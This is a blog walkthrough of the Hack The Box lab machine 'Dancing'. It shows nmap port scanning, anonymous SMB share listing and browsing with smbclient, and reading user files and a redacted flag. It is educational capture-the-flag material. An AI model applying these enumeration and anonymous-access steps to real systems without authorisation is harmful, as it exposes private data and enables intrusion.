nopedawn

HTB | Dancing - Starting Point

https://app.hackthebox.com/machines/Dancing/



Dancing | Walkthrough

Phase
Reconnaissance
Foothold

Reconnaissance

Using nmap to enumerate all open ports in the target

nmap -sV 10.129.146.192
nmap
nopedawn@npdn ~/L/H/S/Dancing> nmap -sV 10.129.146.192
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-09 10:48 WIB
Nmap scan report for 10.129.146.192
Host is up (0.65s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.10 seconds

Target machine is a Windows host with SMB services exposed. Initial port scanning using nmap revealed ports 135, 139, and 445, indicating SMB was available.

smbclient -L //10.129.146.192

From the context of the machine involved is samba (smb), I’ll try to enumerate smb port 445.

smb enumerating
$ smbclient -L //10.129.146.192
Password for [WORKGROUP\nopedawn]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
SMB1 disabled -- no workgroup available

SMB enumeration was performed without credentials. The server allowed anonymous access and exposed several shares, including a custom share named WorkShares.


Foothold

workshares
nopedawn@npdn ~/L/H/S/Dancing> smbclient //10.129.146.192/WorkShares
Password for [WORKGROUP\nopedawn]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 15:22:01 2021
  ..                                  D        0  Mon Mar 29 15:22:01 2021
  Amy.J                               D        0  Mon Mar 29 16:08:24 2021
  James.P                             D        0  Thu Jun  3 15:38:03 2021

                5114111 blocks of size 4096. 1752916 blocks available
smb: \>

There are 4 shares, WorkShares share was accessible anonymously. Two user directories were discovered: Amy.J and James.P.

smb: \> cd Amy.J\
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 16:08:24 2021
  ..                                  D        0  Mon Mar 29 16:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 18:00:37 2021
                5114111 blocks of size 4096. 1753207 blocks available
smb: \Amy.J\> more  worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as /tmp/smbmore.kChz2v (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing
/tmp/smbmore.kChz2v (END)


smb: \Amy.J\> cd ..
smb: \> ls
  .                                   D        0  Mon Mar 29 15:22:01 2021
  ..                                  D        0  Mon Mar 29 15:22:01 2021
  Amy.J                               D        0  Mon Mar 29 16:08:24 2021
  James.P                             D        0  Thu Jun  3 15:38:03 2021

                5114111 blocks of size 4096. 1753191 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 15:38:03 2021
  ..                                  D        0  Thu Jun  3 15:38:03 2021
  flag.txt                            A       32  Mon Mar 29 16:26:57 2021
                5114111 blocks of size 4096. 1753191 blocks available
smb: \James.P\> more flag.txt
getting file \James.P\flag.txt of size 32 as /tmp/smbmore.Qbioc6 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
REDACTED
/tmp/smbmore.Qbioc6 (END)

Anonymous SMB Share with Sensitive Information Disclosure

Prev
HTB | Redeemer - Starting Point
Next
HTB | Fawn - Starting Point